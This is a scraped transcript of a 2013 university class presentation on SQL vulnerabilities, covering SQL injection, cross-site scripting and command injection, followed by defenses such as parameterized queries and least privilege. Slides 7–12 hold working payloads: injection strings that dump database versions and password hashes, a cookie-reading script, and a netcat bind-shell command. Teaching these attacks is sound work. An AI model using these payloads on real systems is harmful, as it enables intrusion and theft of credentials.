1 / 16

SQL Vulnerabilities

SQL Vulnerabilities. Nick Tsamis University of Tulsa CS 7493 April 2013. What is SQL? Why SQL Matters. *yawn* What’s the big deal? What could possibly go wrong? SQL Injection XSS Command Execution * pffft * So we shouldn’t use SQL? That’s some smart SQL!. Outline.

trevor-henry
Download Presentation

SQL Vulnerabilities

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. SQL Vulnerabilities Nick Tsamis University of Tulsa CS 7493 April 2013

  2. What is SQL? • Why SQL Matters. • *yawn* What’s the big deal? • What could possibly go wrong? • SQL Injection • XSS • Command Execution • *pffft* So we shouldn’t use SQL? • That’s some smart SQL! Outline

  3. Structured Query Language • Language • Specialized programming language • Utilized in relational databases • Query • Raw data is queried to obtain information • “Our business is turning data into information.” – Michael A. Peterson • Structured • Adheres to a strict, defined format What is SQL? Query Table Column

  4. Relational Databasesvs Hierarchical Databases • Top down flow only • Data relations are stored

  5. Popularity • One of the first commercial languages for relational models • Today, exists as the de facto standard • (ANSI and ISO) • It’sEVERYWHERE Versatility • It’s flexible: • T-SQL • MySQL • LINQ Why SQL Matters.

  6. Vulnerabilities • SQL is powerful…if you grant it • Manages data some of which is sensitive • Provides a great entry point for access • Recovering lost password: • Security is not always implicit • Raw SQL can be very vulnerable to simple injections • if $EMAIL = “anything' OR 'x'='x” *yawn*What’s the big deal?

  7. SQL Injection • Injecting unintended code into a query • Returning user name from ID • Source code • The attack • We add a second condition that will always examine true (1=1) • Purpose is to dump all user information • $id = ‘ or 1=1 # • WHERE user_id = ‘ ’ or 1=1 # ’ ”; What could possibly go wrong?Injections.

  8. SQL Injection • Injecting unintended code into a query • Returning sql information • The attack(s) • We add a union select to dump additional data • $id = ‘ union SELECT 1, user() # • Yields current sql user • $id = ‘ and 1=1 union select database(),version() # • Yields current sql version and database name What could possibly go wrong?Injections.

  9. SQL Injection • Injecting unintended code into a query • Case Study • Returning the good stuff!! • The attack(s) • We add a union select to dump password data • $id = ‘ union select user, password FROM users # • Yields current user and associated password (hash) What could possibly go wrong?Injections.

  10. XSS (Cross Site Scripting) • Execute unintended scripts inline • Throw an alert • Passed as a url argument • What if we put an inline script in that url? • Alert box shown: What could possibly go wrong?XSS.

  11. XSS (Cross Site Scripting) • Well that wasn’t exactly l33t… • Have a cookie • <script>alert(document.cookie)</script> • Alert box shown: • More serious implications: • Run a custom script that can open a remote connection (backdoor) • Read and dump configuration data (SQL or OS) What could possibly go wrong?XSS.

  12. Command Execution • Use the secret entrance • A site that allows for free IP Pinging • Sample source: • Concatenating commands might work… • 192.168.200.128;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 8999 > /tmp/pipe • Attempts to allow connections on port 8999 with netcat (nc)  • Upon execution, browser waits for connection on port 8999 What could possibly go wrong?Execution.

  13. Better SQL • Stored Procedures • Preformat and secure a static query • Grant access to a SP, not the tables it accesses Typically increased performance • Parameter check – data typing • No network traffic – run inside the engine • String Filtering/Escaping • String escape characters • ‘ • “ • \ • NUL *pffft* So we shouldn’t use SQL?No, we should use better SQL.

  14. Mo’ Better SQL • Parameterized SQL • Strongly typed data is bound on execution • Parameters are populated and checked • User input is not directly embedded • Database Management • Permission limitation • Principle of Least Privilege *pffft* So we shouldn’t use SQL?No, we should use better SQL.

  15. Questions?

  16. http://upload.wikimedia.org/wikipedia/commons/thumb/e/eb/Hierarchical_Model.svg/320px-Hierarchical_Model.svg.pnghttp://upload.wikimedia.org/wikipedia/commons/thumb/e/eb/Hierarchical_Model.svg/320px-Hierarchical_Model.svg.png • http://www.ibm.com/developerworks/library/x-matters8/relat.gif • http://upload.wikimedia.org/wikipedia/commons/a/aa/SQL_ANATOMY_wiki.svg • http://www.unixwiz.net/techtips/sql-injection.html • http://wikipedia.org • http://www.codinghorror.com/blog/2005/04/give-me-parameterized-sql-or-give-me-death.html References

More Related